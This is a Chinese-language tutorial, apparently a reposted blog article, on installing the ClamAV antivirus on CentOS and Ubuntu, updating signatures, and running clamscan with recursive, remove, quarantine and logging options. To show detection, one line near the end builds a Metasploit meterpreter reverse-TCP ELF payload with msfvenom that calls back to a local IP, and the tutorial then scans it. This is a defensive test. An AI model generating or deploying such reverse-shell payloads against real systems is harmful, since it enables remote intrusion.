对于杀毒软件,我们已经司空见惯。但是想在Linux中进行病毒扫描,却并非易事。今天给大家介绍如何在Linux中进行查杀病毒。
介绍
Clam AntiVirus 是一款 UNIX 下开源的 (GPL) 反病毒工具包,专为邮件网关上的电子邮件扫描而设计。该工具包提供了包含灵活且可伸缩的监控程序、命令行扫描程序以及用于自动更新数据库的高级工具在内的大量实用程序。该工具包的核心在于可用于各类场合的反病毒引擎共享库。主要使用ClamAV开源杀毒引擎检测木马、病毒、恶意软件和其他恶意的威胁
安装
CentOS
在CentOS 上安装我们只需只需下面命令即可
yum install -y epel-release
yum install -y clamav
ubuntu上安装
sudo apt install -y clamav
当然,我们还可以通过编译源码的方法进行安装。只不过上诉安装方式是最简单的方法了。
查看帮助
clamscan -h
命令比较多,但是最常用的也就是下面的几项,我们一一道来!
使用
更新病毒库
我们只需执行命令freshclam便可以完成对病毒库的更新。
扫描
参数
-
-r: 指定目标 -
-l: 指定日志 -
-max-dir-recursion: 指定扫描深度
扫描文件
clamscan targetfile
示例
递归扫描home目录,并且记录日志
clamscan -r -i /home -l /var/log/clamscan.log
递归扫描home目录,将病毒文件删除,并且记录日志
clamscan -r -i /home --remove -l /var/log/clamscan.log
扫描指定目录,然后将感染文件移动到指定目录,并记录日志
clamscan -r -i /home --move=/opt/infected -l /var/log/clamscan.log
查杀效果
如,我们在msf中生成一个Linux Shell。上传服务器进行查杀!
生成一个shell
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.123.43 lport=5555 -f elf -o kali.elf
查杀
clamscan kali.elf --remove -l clamscan.log
更多精彩文章 欢迎关注我们
原文始发于微信公众号(kali黑客笔记):Linux下的杀毒软件ClamAV安装及使用
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
文章由极客之音整理,本文链接:https://www.bmabk.com/index.php/post/151619.html
